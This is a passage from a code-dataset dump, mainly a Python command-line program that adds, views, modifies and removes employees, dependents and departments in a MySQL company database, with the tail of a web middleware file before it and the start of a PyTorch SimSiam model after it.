Post-processing of the response (after routing).\n def process_response(self, req, resp, resource, req_succeeded):\n if(req_succeeded):\n if(resp.media and 'status' not in resp.media):\n resp.media['status'] = 'OK'\n elif(resp.body):\n json_util.loads(resp.body)\n \n \n \n \n\n \n","repo_name":"JustJaw/Tic-Tac-Toe-Service","sub_path":"tic_tac_service/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13560075615","text":"import mysql.connector\nimport datetime\n\n\n\n# These set of GET methods acquire a valid input for the respective entry \ndef GetSsn():\n Ssn = 0\n while(1): # Minit (NULL - NO, char(9))\n try: \n Ssn = input(\"Enter the Social Security number XXXXXXXXX: \")\n if (Ssn.isnumeric() == False):\n raise ValueError\n if (Ssn.upper() == \"NULL\"):\n raise NameError\n if (len(Ssn) != 9):\n raise IndexError\n except ValueError:\n print(\"Error: Ssn must be of type char(9) with all numerical values\\n\")\n except NameError:\n print(\"Error: Ssn cannot be NULL\\n\")\n except IndexError:\n print(\"Error: Ssn must be exactly 9 digits long\\n\")\n else:\n return Ssn\ndef GetSuperSsn():\n Super_ssn = \"\"\n while(1): # Super_ssn (NULL - Yes, char(9))\n try: \n Super_ssn = input(\"Enter the Supervisor Social Security number XXXXXXXXX: \")\n if (Super_ssn.isnumeric() == False):\n raise ValueError\n if (len(Super_ssn) != 9):\n raise IndexError\n except ValueError:\n print(\"Error: Super_ssn must be of type char(9) with all numerical values\\n\")\n except IndexError:\n print(\"Error: Super_ssn must be exactly 9 digits long\\n\")\n else:\n return Super_ssn\n\ndef GetDno():\n Dn = 0\n while(1): # Dno (NULL - NO, int(11))\n try: \n Dno = input(\"Enter the department number : \")\n if (Dno.isnumeric() == False):\n raise ValueError\n if (Dno.upper() == \"NULL\"):\n raise NameError\n except ValueError:\n print(\"Error: Dno must be of type int(11)\\n\")\n except NameError:\n print(\"Error: Dno cannot be NULL\\n\")\n else:\n return Dno\n\ndef GetFname():\n Fname = \"\"\n while(1): # Fname (NULL - NO, varchar(15))\n try: \n Fname = input(\"Enter the First Name: \")\n if (Fname.isnumeric() == True):\n raise ValueError\n if (Fname.upper() == \"NULL\"):\n raise NameError\n if (len(Fname) > 15):\n raise IndexError\n except ValueError:\n print(\"Error: Fname must be of type varchar(15)\\n\")\n except NameError:\n print(\"Error: Fname cannot be NULL\\n\")\n except IndexError:\n print(\"Error: Fname can only be 15 characters max length\\n\")\n else:\n return Fname\n\ndef GetMinit():\n Minit = \"\"\n while(1): # Minit (NULL - YES, char(1))\n try: \n Minit = input(\"Enter the Middle Initial: \")\n if (Minit.isnumeric() == True):\n raise ValueError\n if (len(Minit) > 1):\n raise IndexError\n except ValueError:\n print(\"Error: Minit must be of type char(1)\\n\")\n except IndexError:\n print(\"Error: Minit can only be 1 character max length\\n\")\n else:\n return Minit\n\ndef GetLname():\n Lname = \"\"\n while(1): # Fname (NULL - NO, varchar(15))\n try: \n Lname = input(\"Enter the Last Name: \")\n if (Lname.isnumeric() == True):\n raise ValueError\n if (Lname.upper() == \"NULL\"):\n raise NameError\n if (len(Lname) > 15):\n raise IndexError\n except ValueError:\n print(\"Error: Lname must be of type varchar(15)\\n\")\n except NameError:\n print(\"Error: Lname cannot be NULL\\n\")\n except IndexError:\n print(\"Error: Lname can only be 15 characters max length\\n\")\n else:\n return Lname\n \ndef ValidSsn():\n Ssn = \"\"\n FoundSsn = True\n while(FoundSsn):\n Ssn = GetSsn()\n Query = \"select COUNT(Ssn) from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 0):\n FoundSsn = False\n else:\n print(\"Error Primary Key Constraint Ssn must be unique\\n\")\n return Ssn\n\n\n\ndef GetBYear():\n BYear = \"\"\n while(1): # BYear (NULL - YES, date)\n try: \n BYear = input(\"Enter the Year XXXX: \")\n if (BYear.isalpha()):\n if (BYear.upper() == \"NULL\"):\n break\n if (BYear.isnumeric() == False):\n raise ValueError\n if (len(BYear) != 4):\n raise IndexError\n except ValueError:\n print(\"Error: Year must be of type Year\\n\")\n except IndexError:\n print(\"Error: Year format is wrong (XXXX)\\n\")\n else:\n return BYear\n return BYear\n \n\ndef GetBMonth():\n BMonth = \"\"\n while(1): # BMonth(NULL - YES, date)\n try: \n BMonth = input(\"Enter the Month: \")\n if (BMonth.isalpha()):\n if (BMonth.upper() == \"NULL\"):\n break\n if (BMonth .isnumeric() == False):\n raise ValueError\n if (int(BMonth) > 12 or int(BMonth) < 1):\n raise IndexError\n except ValueError:\n print(\"Error: Month must be of type Month\\n\")\n except IndexError:\n print(\"Error: Month can be between (1 - 12)\\n\")\n else:\n return BMonth\n return BMonth\n \n\ndef GetBDay():\n\n BDay = \"\"\n while(1): # BMonth(NULL - YES, date)\n try: \n BDay = input(\"Enter the day X or XX: \")\n if (BDay.isalpha()):\n if (BDay.upper() == \"NULL\"):\n break\n if (BDay .isnumeric() == False):\n raise ValueError\n if (int(BDay) > 31 or int(BDay) < 1):\n raise IndexError\n except ValueError:\n print(\"Error: day must be of type day\\n\")\n except IndexError:\n print(\"Error: day can be between 1 - 31\\n\")\n else:\n return BDay\n return BDay\n \n\n\n\ndef GetBdate():\n Bdate = \"\"\n BYear = GetBYear()\n BMonth = GetBMonth()\n BDay = GetBDay()\n if (BDay.upper() == \"NULL\" or BMonth.upper() == \"NULL\" or BYear.upper() == \"NULL\"):\n Bdate = \"NULL\"\n else:\n Bdate = datetime.date(int(BYear), int(BMonth), int(BDay))\n return Bdate\n\ndef GetAddress():\n Address = \"\"\n while(1): # Address (NULL - YES, varchar(30))\n try: \n Address = input(\"Enter the Address: \")\n if (Address.isnumeric() == True):\n raise ValueError\n if (len(Address) > 30):\n raise IndexError\n except ValueError:\n print(\"Error: Address must be of type varchar(30)\\n\")\n except IndexError:\n print(\"Error: Address can only be 30 character max length\\n\")\n else:\n return Address\n\ndef GetSex():\n Sex = \"\"\n while(1): # Minit (NULL - YES, char(1))\n try: \n Sex = input(\"Enter the Sex (M/F): \")\n if (Sex.isnumeric() == True):\n raise ValueError\n if (len(Sex) > 1):\n raise IndexError\n except ValueError:\n print(\"Error: Sex must be of type char(1)\\n\")\n except IndexError:\n print(\"Error: Sex can only be 1 character M or F\\n\")\n else:\n return Sex\n\ndef GetSalary():\n Salary = 0\n while(1): # Salary (NULL - YES, decimal(10,2))\n try: \n Salary = input(\"Enter the salary: \")\n if (Salary.isalpha() == True):\n raise ValueError\n except ValueError:\n print(\"Error: Salary must be of type decimal(10,2)\\n\")\n else:\n return Salary\n\ndef SuperSsn():\n Super_ssn = \"\"\n foundSuperSsn = True\n while(foundSuperSsn):\n Super_ssn = GetSuperSsn()\n Query = \"select COUNT(Ssn) from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Super_ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 1):\n foundSuperSsn = False\n else:\n print(\"Error Foreign Key Constraint Super_ssn must reference an existing ssn\\n\") \n return Super_ssn\n\n\n\ndef ValidDno():\n Dno = 0\n Keeplooking = True\n while (Keeplooking):\n Dno = GetDno()\n Query = \"select COUNT(Dnumber) from DEPARTMENT WHERE Dnumber = %s\"\n mycursor.execute(Query, (Dno,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 1):\n Keeplooking = False\n else:\n print(\"Error Foreign Key Constraint Dno must reference an existing Department\\n\")\n return Dno\n\n\ndef AddNewEmployee(database):\n mycursor = database.cursor()\n\n # Input constraints on the input values\n Fname = GetFname()\n Minit = GetMinit()\n Lname = GetLname()\n Ssn = ValidSsn() # Constraint 1: Ssn Must be unique\n Bdate = GetBdate()\n Address = GetAddress()\n Sex = GetSex()\n Salary = GetSalary()\n Super_ssn = SuperSsn() # Constraint 2: Super_ssn must reference an existing Ssn entry\n Dno = ValidDno() # Constrint 3: Dno must reference an existing Department \n\n # Insert into the database and commit chaanges\n Insert_New_Employee = (\n \"\"\"INSERT INTO EMPLOYEE (Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\")\n \n mycursor.execute(Insert_New_Employee, (Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno))\n \n # Commit and close the connection\n database.commit()\n mycursor.close()\n\n\n\ndef ViewEmployee(database):\n # Employee info\n Employee_ssn = input(\"Enter an employee ssn: \")\n Query = \"select * from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Employee_ssn,)) \n result = mycursor.fetchall()\n print(\"Employee Information\\n----------------------\")\n for (Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno) in result:\n # Employee Information\n print(\"\\nFirst name: \"+ Fname)\n print(\"Middle initial: \" + Minit)\n print(\"Last name: \"+ Lname)\n print(\"SSN:\" + Ssn)\n print(\"Birth date: \"+ str(Bdate))\n print(\"Address: \"+ Address)\n print(\"Sex: \"+ Sex)\n print(\"Salary: $\" + str(Salary))\n print(\"Supervisor SSN: \" +Super_ssn)\n print(\"Department number: \"+ str(Dno))\n\n # Supervisor Name\n Query = \"select Fname, Minit, Lname from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Super_ssn,)) \n result = mycursor.fetchall()\n print(\"\\nSupervisor Name\\n----------------------\")\n for Fname, Minit, Lname in result:\n print(\"First name: \" + Fname)\n print(\"Middle initial: \" + Minit)\n print(\"Last name: \"+ Lname)\n \n # Department Name\n Query = \"select Dname from DEPARTMENT WHERE Dnumber = %s\"\n mycursor.execute(Query, (Dno,)) \n result = mycursor.fetchall()\n print(\"\\nDepartment Name\\n----------------------\")\n for Dname in result:\n print(\"Department Name: \"+Dname[0])\n \n # Dependents\n Query = \"select * from DEPENDENT WHERE Essn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n print(\"\\nDependents\\n----------------------\")\n for i in result:\n print(i)\n print()\n\n # Commit and close the connection\n database.commit()\n mycursor.close()\n\ndef ModifyMenu():\n print(\"Select an attribute to modify\\n\\t\\t(1)--Fname\\n\\t\\t(2)--Minit\\n\\t\\t(3)--Lname\\n\\t\\t(4)--Ssn\\n\\t\\t(5)--Bdate\\n\\t\\t\"+\n \"(6)--Address\\n\\t\\t(7)--Sex\\n\\t\\t(8)--Salary\\n\\t\\t(9)--Super_ssn\\n\\t\\t(10)-Dno\\n\")\n \ndef ModifyEmployee(database):\n mycursor = database.cursor()\n # Query the tuple and lock it\n Employee = input(\"Enter the employee ssn you want to modify: \")\n Query = (\"SELECT * FROM EMPLOYEE WHERE Ssn = %s FOR UPDATE\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n for i in result:\n print(\"\\nProfile in Modification\\n---------------------\")\n print(i)\n print()\n\n ModifyMenu()\n option = 100\n while (1): # Input error handling\n try:\n option = int(input(\"Enter an option: \"))\n if (option < 1 or option > 10):\n raise ValueError\n except ValueError:\n print(\"Try again and enter a valid number\")\n else:\n break\n\n if (option == 1): # Fname\n Fname = GetFname()\n Query = \"UPDATE EMPLOYEE SET Fname = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Fname, Employee, )) \n \n\n if (option == 2): # Minit\n Minit = GetMinit()\n Query = \"UPDATE EMPLOYEE SET Minit = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Minit, Employee, )) \n \n if (option == 3): # Lname\n Lname = GetLname()\n Query = \"UPDATE EMPLOYEE SET Lname = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Lname, Employee, )) \n\n if (option == 4): # Ssn\n Ssn = GetSsn()\n Query = \"UPDATE EMPLOYEE SET Ssn = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Ssn, Employee, )) \n\n if (option == 5): # Bdate\n print(\"Enter information about Birth day\")\n Bdate = GetBdate()\n Query = \"UPDATE EMPLOYEE SET Bdate = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Bdate, Employee, )) \n\n if (option == 6): # Address\n Address = GetAddress()\n Query = \"UPDATE EMPLOYEE SET Address = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Address, Employee, )) \n\n if (option == 7): # Sex\n Sex = GetSex()\n Query = \"UPDATE EMPLOYEE SET Sex = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Sex, Employee, )) \n\n if (option == 8): # Salary\n Salary = GetSalary()\n Query = \"UPDATE EMPLOYEE SET Salary = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Salary, Employee, )) \n\n if (option == 9): # Super_ssn\n Super_ssn = SuperSsn()\n Query = \"UPDATE EMPLOYEE SET Super_ssn = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Super_ssn, Employee, )) \n\n if (option == 10): # Dno\n Dno = ValidDno()\n Query = \"UPDATE EMPLOYEE SET Dno = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Dno, Employee, )) \n\n\n\n # Commit and close the connection\n database.commit()\n mycursor.close()\n\n \n\ndef AddNewDependent(database):\n mycursor = database.cursor()\n # Lock the employee record\n Employee = input(\"Enter the employee ssn you want to add a dependent to: \")\n Query = (\"SELECT * FROM EMPLOYEE WHERE Ssn = %s FOR UPDATE\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n for i in result:\n print(\"\\nEmployee getting a new dependent\\n---------------------\")\n print(i)\n print()\n \n # Display all Dependents\n Query = (\"SELECT * FROM DEPENDENT WHERE Essn = %s\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n print(\"\\nList of Dependents\\n---------------------\")\n for i in result:\n print(i)\n print()\n \n # Inputs for new dependent\n Essn = Employee\n Dependent_Name = GetFname()\n Sex = GetSex()\n Bdate = GetBdate()\n Relationship = input(\"Enter the relationship to the Employee: \")\n\n # Inert Dependent into database\n Insert_New_Dependent = (\n \"\"\"INSERT INTO DEPENDENT (Essn, Dependent_name, Sex, Bdate, Relationship)\n VALUES (%s, %s, %s, %s, %s)\"\"\")\n mycursor.execute(Insert_New_Dependent, (Essn, Dependent_Name, Sex, Bdate, Relationship))\n\n Query = (\"SELECT * FROM DEPENDENT WHERE Essn = %s\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n print(\"\\nList of Dependents\\n---------------------\")\n for i in result:\n print(i)\n print()\n database.commit()\n mycursor.close()\n\n\n\n\ndef RemoveDependent(database):\n mycursor = database.cursor()\n # Lock the employee record\n Employee = input(\"Enter the employee ssn you want to add a dependent to: \")\n Query = (\"SELECT * FROM EMPLOYEE WHERE Ssn = %s FOR UPDATE\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n for i in result:\n print(\"\\nEmployee getting a new dependent\\n---------------------\")\n print(i)\n print()\n \n # Display all Dependents\n Query = (\"SELECT * FROM DEPENDENT WHERE Essn = %s\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n print(\"\\nList of Dependents\\n---------------------\")\n for i in result:\n print(i)\n print()\n\n # Remove the dependent from the database\n Dependent_Name = GetFname()\n Query = \"DELETE from DEPENDENT WHERE Dependent_name = %s\"\n mycursor.execute(Query, (Dependent_Name, )) \n database.commit()\n\n # Display all Dependents\n Query = (\"SELECT * FROM DEPENDENT WHERE Essn = %s\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n print(\"\\nList of Dependents after modification\\n----------------------------\")\n for i in result:\n print(i)\n print()\n mycursor.close()\n\n\ndef AddNewDepartment(database):\n mycursor = database.cursor()\n # Constraint 1: Mgr_ssn must reference an employee ssn\n # Mgr_ssn cannot be null\n \n FoundSsn = True\n Mgr_ssn = \"\"\n while(FoundSsn):\n Mgr_ssn = input(\"Enter a Manager Ssn: \")\n if (Mgr_ssn.upper() == \"NULL\"):\n print(\"Mgr_ssn cannot be NULL\")\n continue\n Query = \"select COUNT(Ssn) from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Mgr_ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 1):\n FoundSsn = False\n else:\n print(\"Error: Foreign Key Constraint Mgr_ssn must reference an existing employe ssn\\n\")\n\n # Constraint 2: Dname ust be unique\n # Dname connot be NULL\n FoundSsn = True\n Dname = \"\"\n while(FoundSsn):\n Dname = input(\"Enter department Name: \")\n if (Dname.upper() == \"NULL\"):\n print(\"Department name cannot be NULL\")\n continue\n Query = \"select COUNT(Dname) from DEPARTMENT WHERE Dname = %s\"\n mycursor.execute(Query, (Dname,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 0):\n FoundSsn = False\n else:\n print(\"Error: Unique Key Constraint Dname must be unique\\n\")\n\n # COnstraint 3: Dnumber has to be unique\n # Dnumber cannot be NULL\n FoundSsn = True\n Dnumber = \"\"\n while(FoundSsn):\n Dnumber = input(\"Enter department Number: \")\n if (Dnumber.upper() == \"NULL\"):\n print(\"Department number cannot be NULL\\n\")\n continue\n if (Dnumber.isalpha() == True):\n print(\"Department number has to be an integer\\n\")\n continue\n Query = \"select COUNT(Dnumber) from DEPARTMENT WHERE Dnumber = %s\"\n mycursor.execute(Query, (Dnumber,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 0):\n FoundSsn = False\n else:\n print(\"Error Unique Key Constraint Dnumber must be unique\\n\")\n\n \n # Mgr_start_date can be null\n print(\"Enter information about the manager start date\")\n Mgr_start_date = GetBdate()\n\n # Insert department into the database\n Insert_New_Department = (\n \"\"\"INSERT INTO DEPARTMENT (Dname, Dnumber, Mgr_ssn, Mgr_start_date)\n VALUES (%s, %s, %s, %s)\"\"\")\n \n mycursor.execute(Insert_New_Department, (Dname, Dnumber, Mgr_ssn, Mgr_start_date))\n database.commit()\n\n\n # Display all Dependents\n Query = (\"SELECT * FROM DEPARTMENT\")\n mycursor.execute(Query) \n result = mycursor.fetchall()\n print(\"\\nList of Departments\\n---------------------\")\n for i in result:\n print(i)\n print()\n\ndef AddDepartmentLocation(database):\n mycursor = database.cursor()\n # Ask for Dnumber\n Dnumber = input(\"Enter the department number: \")\n Query = (\"SELECT * FROM DEPARTMENT WHERE Dnumber = %s FOR UPDATE\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n\n # Show all locations\n Query = (\"SELECT * FROM DEPT_LOCATIONS WHERE Dnumber = %s\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n print(\"\\nList of Department Locations\\n---------------------\")\n for i in result:\n print(i)\n print()\n\n # Ask for new location\n New_location = input(\"Enter a new location: \")\n # Create a new location record and insert into the database\n Insert_New_Dlocation = (\n \"\"\"INSERT INTO DEPT_LOCATIONS (Dnumber, Dlocation)\n VALUES (%s, %s)\"\"\")\n mycursor.execute(Insert_New_Dlocation, (Dnumber, New_location))\n database.commit()\n\n\ndef RemoveDepartmentLocation(database):\n mycursor = database.cursor()\n # Ask for Dnumber and lock the record\n Dnumber = input(\"Enter the department number: \")\n Query = (\"SELECT * FROM DEPARTMENT WHERE Dnumber = %s FOR UPDATE\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n\n # Show all locations\n Query = (\"SELECT * FROM DEPT_LOCATIONS WHERE Dnumber = %s\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n print(\"\\nList of Department Locations\\n---------------------\")\n for i in result:\n print(i)\n print()\n\n # Ask for the location to be removed\n Location = input(\"Enter the location to be deleted: \")\n\n # remove the location\n Query = \"DELETE from DEPT_LOCATIONS WHERE Dlocation = %s AND Dnumber = %s\"\n mycursor.execute(Query, (Location, Dnumber, )) \n database.commit()\n\n\n print()\n # CLose the connection\n\ndef RemoveEmployee(database):\n mycursor = database.cursor()\n # Ask For Employee Ssn\n Ssn = input(\"Enter an employee SSN: \")\n\n # Lock and show employee information\n Query = (\"SELECT * FROM EMPLOYEE WHERE Ssn = %s FOR UPDATE\")\n mycursor.execute(Query, (Ssn, )) \n result = mycursor.fetchall()\n print(\"\\nEmployee entry for deletion\\n---------------------\")\n for i in result:\n print(i)\n print()\n\n # Ask confirmation to delete\n confirm = True\n while (confirm):\n Confirmation = input(\"\\n1) Enter \\\"Yes\\\" if you wish to delete\\n2) Enter \\\"No\\\" to cancel\\n\")\n if (Confirmation.isalpha() == True):\n if (Confirmation.upper() == \"YES\"):\n confirm = False\n elif (Confirmation.upper() == \"NO\"):\n return\n\n\n # Check if any dependencies exist\n print()\n Dependencies = False\n\n # Constraint 1: Foreign key Constraint EMPLOYEE Super_ssn references employee Ssn\n Query = \"select COUNT(Super_ssn) from EMPLOYEE WHERE Super_ssn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign key Constraint, EMPLOYEE Super_ssn references employee ssn\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from EMPLOYEE WHERE Super_ssn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n # Constraint 2: Foreign Key Constraint, DEPENDENT Essn references employee SSN\n Query = \"select COUNT(Essn) from DEPENDENT WHERE Essn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign key Constraint, DEPENDENT Essn references employee ssn\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from DEPENDENT WHERE Essn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n # Constraint 3: Foreign Key Constraint, DEPARTMENT Mgr_ssn references employee ssn\n Query = \"select COUNT(Mgr_ssn) from DEPARTMENT WHERE Mgr_ssn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign Key Constraint, DEPARTMENT Mgr_ssn references employee ssn\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from DEPARTMENT WHERE Mgr_ssn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n\n # Constraint 4: Foreign Key Constraint, WORKS_ON Essn references employee SSN\n Query = \"select COUNT(Essn) from WORKS_ON WHERE Essn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign Key Constraint, WORKS_ON Essn references employee ssn\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from WORKS_ON WHERE Essn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n \n # Delete if no dependencies, else ask them to remove the dependencies\n if (Dependencies == True):\n print(\"Dependencies exist, remove them first before deleting employee profile\\n\")\n database.commit()\n return\n else:\n print(\"No dependencies exist the profile will be deleted.\")\n Query = \"DELETE from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Ssn, )) \n database.commit()\n\n\ndef RemoveDepartment(database):\n mycursor = database.cursor()\n # Ask for the Dnumber\n department = input(\"Enter an Dnumber: \")\n\n # Lock and show department information\n Query = (\"SELECT * FROM DEPARTMENT WHERE Dnumber = %s FOR UPDATE\")\n mycursor.execute(Query, (department, )) \n result = mycursor.fetchall()\n print(\"\\nDepartment entry for deletion\\n---------------------\")\n for i in result:\n print(i)\n print()\n\n # Ask confirmation for deletion\n confirm = True\n while (confirm):\n Confirmation = input(\"\\n1) Enter \\\"Yes\\\" if you wish to delete\\n2) Enter \\\"No\\\" to cancel\\n\")\n if (Confirmation.isalpha() == True):\n if (Confirmation.upper() == \"YES\"):\n confirm = False\n elif (Confirmation.upper() == \"NO\"):\n print()\n return\n\n # Check if any dependencies exist\n print()\n Dependencies = False\n\n\n # Constraint 1: Foreign Key Constraint, DEPT_LOCATIONS Dnumber references department Dnumber\n Query = \"select COUNT(Dnumber) from DEPT_LOCATIONS WHERE Dnumber = %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign Key Constraint, DEPT_LOCATIONS Dnumber references department Dnumber\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from DEPT_LOCATIONS WHERE Dnumber = %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n\n\n # Constraint 2: Foreign Key Constraint, EMPLOYEE Dno references department Dnumber\n Query = \"select COUNT(Dno) from EMPLOYEE WHERE Dno = %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign Key Constraint, EMPLOYEE Dno references department Dnumber\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from EMPLOYEE WHERE Dno= %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n\n # Constraint 3: Foreign Key Constraint, PROJECT Dnum references department DNumber\n Query = \"select COUNT(Dnum) from PROJECT WHERE Dnum = %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign Key Constraint, PROJECT Dnum references department DNumber\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from PROJECT WHERE Dnum= %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n\n # Delete if no dependencies, else ask them to remove the dependencies\n if (Dependencies == True):\n print(\"Dependencies exist, remove them first before deleting department\")\n database.commit()\n return\n else:\n print(\"No dependencies exist the department will be deleted.\")\n Query = \"DELETE from DEPARTMENT WHERE Dnumber= %s\"\n mycursor.execute(Query, (department, )) \n database.commit()\n\ndef ViewDepartment(database): \n mycursor = database.cursor()\n # input the depratment number\n Dnumber = input(\"Enter the Department number: \")\n print()\n\n # Show the managers name\n Query = (\"SELECT Fname, Minit, Lname FROM DEPARTMENT, EMPLOYEE WHERE Dnumber = %s AND Mgr_ssn = Ssn\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n print(\"Department Manager\\n---------------------\")\n for Fname, Minit, Lname in result:\n print(\"First name: \"+ Fname)\n print(\"Middle intial: \"+ Minit)\n print(\"last name: \"+ Lname)\n print()\n\n\n\n # Display all the locations\n print(\"All locations\\n--------------\")\n Query = (\"SELECT Dlocation FROM DEPARTMENT, DEPT_LOCATIONS WHERE DEPARTMENT.Dnumber = %s AND DEPARTMENT.Dnumber = DEPT_LOCATIONS.Dnumber\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n for i in result:\n print(i[0])\n print()\n\n\n\n\ndef Menu(database):\n # when selecting an option type the number corresponding to that option\n ExitProgram = 0\n Menu = (\"Select an option:\\n\\t\\t(1)--Add new employee\\n\\t\\t(2)--View employee\\n\\t\\t(3)--Modify employee\\n\\t\\t(4)--Remove employee\" +\n \"\\n\\t\\t(5)--Add new dependent\\n\\t\\t(6)--Remove dependent\\n\\t\\t(7)--Add new department\\n\\t\\t(8)--View department\" +\n \"\\n\\t\\t(9)--Remove department\\n\\t\\t(10)-Add department location\\n\\t\\t(11)-Remove department location\\n\\t\\t(12)-Exit program\") \n\n\n while (ExitProgram == 0): \n print(Menu)\n option = 100\n while (1): # Input error handling\n try:\n option = int(input(\"Enter an option: \"))\n if (option < 1 or option > 12):\n raise ValueError\n except ValueError:\n print(\"Try again and enter a valid number\")\n else:\n break\n\n if (option == 1): # Option handling\n AddNewEmployee(database)\n elif (option == 2):\n ViewEmployee(database)\n elif (option == 3):\n ModifyEmployee(database)\n elif (option == 4):\n RemoveEmployee(database)\n elif (option == 5):\n AddNewDependent(database)\n elif (option == 6):\n RemoveDependent(database) \n elif (option == 7):\n AddNewDepartment(database)\n elif (option == 8):\n ViewDepartment(database)\n elif (option == 9):\n RemoveDepartment(database)\n elif (option == 10):\n AddDepartmentLocation(database)\n elif (option == 11):\n RemoveDepartmentLocation(database)\n elif (option == 12):\n ExitProgram = 1\n database.close()\n\n\nif __name__ == \"__main__\":\n\n\t# password has been removed \n mydb = mysql.connector.connect(user='root', password='', host='localhost', database='COMPANY') \n\n mycursor = mydb.cursor()\n Menu(mydb)\n \n mydb.close()\n mycursor.close()\n\n\n\n\n\n\n","repo_name":"cseuconn/OS-4300-2022-Spring","sub_path":"Harold_Suquillo/Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":32841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29052401628","text":"import torch.nn as nn\nfrom modules.dgcnn_dense import DGCNN_dense\n\nclass DenseSimSiam(nn.Module):\n \"\"\"\n Build a SimSiam model.\n \"\"\"\n def __init__(self, base_encoder=DGCNN_dense, args=None, seg_num_all=50):\n \"\"\"\n dim: feature dimension (default: 2048)\n pred_dim: hidden dimension of the predictor (default: 512)\n \"\"\"\n super(DenseSimSiam, self).__init__()\n channel = 256\n # create the encoder\n # num_classes is the output fc dimension, zero-initialize last BNs\n self.encoder = base_encoder(args=args, seg_num_all=seg_num_all)\n\n # build a 2-layer predictor\n self.predictor = nn.Sequential(nn.Linear(channel, 512, bias=False),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(negative_slope=0.2, inplace=True), # hidden layer\n nn.Linear(512, channel, bias=False)) # output layer\n\n self.classifier = nn.Sequential(\n nn.Conv1d(channel, 512, 1, bias=False),\n 